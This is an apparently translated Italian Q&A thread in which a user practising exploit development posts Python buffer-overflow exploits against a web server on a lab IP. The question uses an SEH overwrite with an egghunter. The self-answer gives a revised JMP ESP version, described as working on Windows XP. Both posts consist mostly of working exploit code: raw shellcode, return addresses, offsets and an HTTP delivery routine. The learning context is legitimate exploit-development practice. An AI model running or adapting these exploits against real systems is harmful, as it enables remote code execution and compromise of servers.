Hai bisogno di aiuto per bypassare Structured Exception Handling (SEH) + egghunter

3

Sto praticando lo sviluppo degli exploit e sto cercando di rifare questo exploit da solo nello stesso ambiente: link di exploit

Affronto un problema che l'egghunter non è in esecuzione Ho anche provato quello nell'exploit e non è stato eseguito anch'io Eseguo l'exploit e non è andato a buon fine, ho provato ad usare egghunter generato dallo strumento egghunter.rb nel metasploit codificato con codificatori diversi e non è andato bene, quindi ho provato un altro egghunter generato dal comando mona.py nel debugger di immunità e inoltre non ha funzionato, ecco il codice qui sotto:

import socket

ip='192.168.163.130'
port=80
#!mona seh
#6FC5447E   5E               POP POP RETN address
seh="\x7e\x44\xc5\x6f"
nseh="\xeb\xE0\x90\x90"
# short jmp back to run egghunter 
#Attempting to encode payload with 1 iterations of x86/alpha_mixed
#x86/alpha_mixed succeeded with size 727 (iteration=0)
#x86/alpha_mixed chosen with final size 727
#Payload size: 727 bytes

shellcode=("\x89\xe2\xdb\xd4\xd9\x72\xf4\x59\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x59"
"\x6c\x7a\x48\x4f\x72\x53\x30\x53\x30\x73\x30\x73\x50\x6d\x59"
"\x39\x75\x70\x31\x59\x50\x61\x74\x4c\x4b\x52\x70\x74\x70\x6c"
"\x4b\x61\x42\x74\x4c\x6e\x6b\x33\x62\x65\x44\x6c\x4b\x74\x32"
"\x71\x38\x74\x4f\x4c\x77\x30\x4a\x75\x76\x56\x51\x49\x6f\x6e"
"\x4c\x75\x6c\x30\x61\x33\x4c\x35\x52\x46\x4c\x77\x50\x79\x51"
"\x68\x4f\x56\x6d\x67\x71\x58\x47\x59\x72\x7a\x52\x36\x32\x53"
"\x67\x4c\x4b\x73\x62\x36\x70\x6c\x4b\x61\x5a\x67\x4c\x4c\x4b"
"\x52\x6c\x47\x61\x44\x38\x78\x63\x32\x68\x36\x61\x6e\x31\x46"
"\x31\x4e\x6b\x72\x79\x51\x30\x73\x31\x48\x53\x4e\x6b\x71\x59"
"\x45\x48\x4b\x53\x35\x6a\x70\x49\x6e\x6b\x36\x54\x6c\x4b\x67"
"\x71\x4e\x36\x45\x61\x59\x6f\x6e\x4c\x4a\x61\x6a\x6f\x66\x6d"
"\x53\x31\x39\x57\x76\x58\x49\x70\x50\x75\x5a\x56\x44\x43\x71"
"\x6d\x4b\x48\x65\x6b\x53\x4d\x34\x64\x61\x65\x6a\x44\x46\x38"
"\x4e\x6b\x73\x68\x67\x54\x33\x31\x58\x53\x73\x56\x6c\x4b\x66"
"\x6c\x70\x4b\x6e\x6b\x31\x48\x65\x4c\x46\x61\x6a\x73\x6e\x6b"
"\x57\x74\x6c\x4b\x75\x51\x68\x50\x6f\x79\x50\x44\x51\x34\x77"
"\x54\x73\x6b\x61\x4b\x43\x51\x52\x79\x73\x6a\x56\x31\x6b\x4f"
"\x6b\x50\x51\x4f\x61\x4f\x62\x7a\x4c\x4b\x64\x52\x68\x6b\x6c"
"\x4d\x63\x6d\x72\x48\x77\x43\x64\x72\x57\x70\x33\x30\x71\x78"
"\x50\x77\x53\x43\x44\x72\x53\x6f\x56\x34\x61\x78\x50\x4c\x64"
"\x37\x77\x56\x53\x37\x6b\x4f\x79\x45\x6d\x68\x6e\x70\x56\x61"
"\x33\x30\x33\x30\x75\x79\x69\x54\x63\x64\x76\x30\x65\x38\x64"
"\x69\x6b\x30\x52\x4b\x47\x70\x59\x6f\x4e\x35\x51\x7a\x76\x65"
"\x73\x58\x4f\x30\x79\x38\x6f\x53\x6b\x33\x73\x58\x55\x52\x77"
"\x70\x64\x51\x63\x6c\x4e\x69\x4b\x56\x32\x70\x72\x70\x30\x50"
"\x66\x30\x77\x30\x72\x70\x67\x30\x50\x50\x52\x48\x39\x7a\x56"
"\x6f\x49\x4f\x6b\x50\x69\x6f\x6a\x75\x4e\x77\x63\x5a\x36\x70"
"\x32\x76\x63\x67\x62\x48\x7a\x39\x6c\x65\x30\x74\x31\x71\x6b"
"\x4f\x4e\x35\x4b\x35\x49\x50\x52\x54\x65\x5a\x59\x6f\x30\x4e"
"\x67\x78\x43\x45\x5a\x4c\x6b\x58\x43\x51\x35\x50\x73\x30\x47"
"\x70\x62\x4a\x65\x50\x61\x7a\x37\x74\x76\x36\x32\x77\x55\x38"
"\x65\x52\x39\x49\x59\x58\x71\x4f\x69\x6f\x78\x55\x4b\x33\x4c"
"\x38\x43\x30\x63\x4e\x34\x76\x6c\x4b\x34\x76\x30\x6a\x53\x70"
"\x72\x48\x77\x70\x64\x50\x57\x70\x63\x30\x31\x46\x51\x7a\x75"
"\x50\x70\x68\x30\x58\x6f\x54\x72\x73\x5a\x45\x79\x6f\x6a\x75"
"\x4d\x43\x51\x43\x33\x5a\x43\x30\x71\x46\x33\x63\x36\x37\x31"
"\x78\x46\x62\x78\x59\x5a\x68\x33\x6f\x39\x6f\x68\x55\x4f\x73"
"\x58\x78\x47\x70\x73\x4d\x55\x72\x33\x68\x53\x58\x63\x30\x37"
"\x30\x73\x30\x65\x50\x51\x7a\x33\x30\x32\x70\x73\x58\x44\x4b"
"\x36\x4f\x34\x4f\x56\x50\x59\x6f\x7a\x75\x33\x67\x52\x48\x33"
"\x45\x50\x6e\x70\x4d\x75\x31\x59\x6f\x6a\x75\x53\x6e\x63\x6e"
"\x39\x6f\x34\x4c\x57\x54\x49\x79\x51\x61\x79\x6f\x4b\x4f\x49"
"\x6f\x65\x51\x59\x53\x67\x59\x78\x46\x74\x35\x4f\x37\x48\x43"
"\x4f\x4b\x6c\x30\x6e\x55\x4e\x42\x56\x36\x50\x6a\x53\x30\x42"
"\x73\x4b\x4f\x79\x45\x41\x41")
egghunter=(
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)
payload="A"*2248+egghunter+nseh+seh+"D"*(5005-2280-4-4-62)
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
request=("GET / HTTP/1.1\r\n"
"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0\r\n"
"Accept-Language: "+"w00tw00t"+shellcode+"\r\n"
"Accept-Encoding: deflate, gzip\r\n"
"cookie: frmUserName=test; frmUserPass=pass; rememberPass=202%2C197%2C208%2C215%2C201; UserID=ID; PassWD=PassWD\r\n"
"Connection: "+payload+"\r\n\r\n")
s.send(request)
s.recv(1024)
s.close();

ed ecco le immagini dal debugger:

nota: dal momento che lo stack overflow non mi consente di inserire più di due link, al termine metteremo il resto dei collegamenti alle immagini.

come puoi vedere ogni cosa nell'exploit sta funzionando bene ma una volta che ha iniziato a eseguire l'egghunter si è verificato un errore, ho modificato il mio codice e ho ricalcolato il payload con quello generato genericamente creato da mona questa volta, e sfortunatamente non ha funzionato, quindi chiunque può aiutarmi per favore a sapere qual è il problema?

da parte mia penso che il problema sia la violazione dell'accesso che l'egghunter non può leggere nella memoria, è possibile risolvere questo problema per qualsiasi aiuto?

link

link

link

link

link

    
posta HAlmusajjen 28.01.2017 - 20:05
fonte

1 risposta

0

Ho trovato la soluzione, prima di tutto l'ambiente corretto non è Windows 7, è Windows XP, non so perché l'egghunter non è in esecuzione in Windows 7, ma ho testato il seguente exploit e funziona perfettamente su windows xp

import socket

ip='192.168.163.128'
port=80

#Payload size: 360 bytes
#bad charecters "\x00\x0a\x0d\x0e\xfe\x5c"
shellcode=(
"\xdb\xc9\xba\xbf\x25\xd3\xec\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
"\x54\x83\xc6\x04\x31\x56\x14\x03\x56\xab\xc7\x26\x10\x3b\x85"
"\xc9\xe9\xbb\xea\x40\x0c\x8a\x2a\x36\x44\xbc\x9a\x3c\x08\x30"
"\x50\x10\xb9\xc3\x14\xbd\xce\x64\x92\x9b\xe1\x75\x8f\xd8\x60"
"\xf5\xd2\x0c\x43\xc4\x1c\x41\x82\x01\x40\xa8\xd6\xda\x0e\x1f"
"\xc7\x6f\x5a\x9c\x6c\x23\x4a\xa4\x91\xf3\x6d\x85\x07\x88\x37"
"\x05\xa9\x5d\x4c\x0c\xb1\x82\x69\xc6\x4a\x70\x05\xd9\x9a\x49"
"\xe6\x76\xe3\x66\x15\x86\x23\x40\xc6\xfd\x5d\xb3\x7b\x06\x9a"
"\xce\xa7\x83\x39\x68\x23\x33\xe6\x89\xe0\xa2\x6d\x85\x4d\xa0"
"\x2a\x89\x50\x65\x41\xb5\xd9\x88\x86\x3c\x99\xae\x02\x65\x79"
"\xce\x13\xc3\x2c\xef\x44\xac\x91\x55\x0e\x40\xc5\xe7\x4d\x0c"
"\x2a\xca\x6d\xcc\x24\x5d\x1d\xfe\xeb\xf5\x89\xb2\x64\xd0\x4e"
"\xb5\x5e\xa4\xc1\x48\x61\xd5\xc8\x8e\x35\x85\x62\x27\x36\x4e"
"\x73\xc8\xe3\xfb\x76\x5e\xcc\x54\xdb\x1d\xa4\xa6\x1c\x30\x69"
"\x2e\xfa\x62\xc1\x60\x53\xc2\xb1\xc0\x03\xaa\xdb\xce\x7c\xca"
"\xe3\x04\x15\x60\x0c\xf1\x4d\x1c\xb5\x58\x05\xbd\x3a\x77\x63"
"\xfd\xb1\x72\x93\xb3\x31\xf6\x87\xa3\x23\xf8\x57\x33\xce\xf8"
"\x3d\x37\x58\xae\xa9\x35\xbd\x98\x75\xc6\xe8\x9a\x72\x38\x6d"
"\xab\x09\x0e\xfb\x93\x65\x6e\xeb\x13\x76\x38\x61\x14\x1e\x9c"
"\xd1\x47\x3b\xe3\xcf\xfb\x90\x71\xf0\xad\x45\xd2\x98\x53\xb3"
"\x14\x07\xab\x96\x27\x40\x53\x64\x05\xe9\x3c\x96\x09\x09\xbd"
"\xfc\x89\x59\xd5\x0b\xa6\x56\x15\xf3\x6d\x3f\x3d\x7e\xe3\x8d"
"\xdc\x7f\x2e\x53\x41\x7f\xdc\x48\x94\x0e\x23\x6f\x99\xf0\x18"
"\xb9\xa0\x86\x59\x79\x97\x99\xd0\xdc\xbe\x33\x1a\x72\xc0\x11"
)
#size 32
egghunter=(
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)
#78196D4D   FFE4             JMP ESP
jmpESP="\x4d\x6d\x19\x78"
payload="A"*2048+jmpESP+egghunter+"D"*(2100-4-2048)

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
request=("GET / HTTP/1.1\r\n"
"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0\r\n"
"Accept-Language: "+"w00tw00t"+shellcode+"\r\n"
"Accept-Encoding: deflate, gzip\r\n"
"cookie: frmUserName=test; frmUserPass=pass; rememberPass=202%2C197%2C208%2C215%2C201; UserID=ID; PassWD=PassWD\r\n"
"Connection: "+payload+"\r\n\r\n")
s.send(request)
s.recv(1024)
s.close();

ma dì ora che non faccio come eseguire lo stesso exploit su Windows 7, qualsiasi aiuto per favore?

    
risposta data 29.01.2017 - 20:48
fonte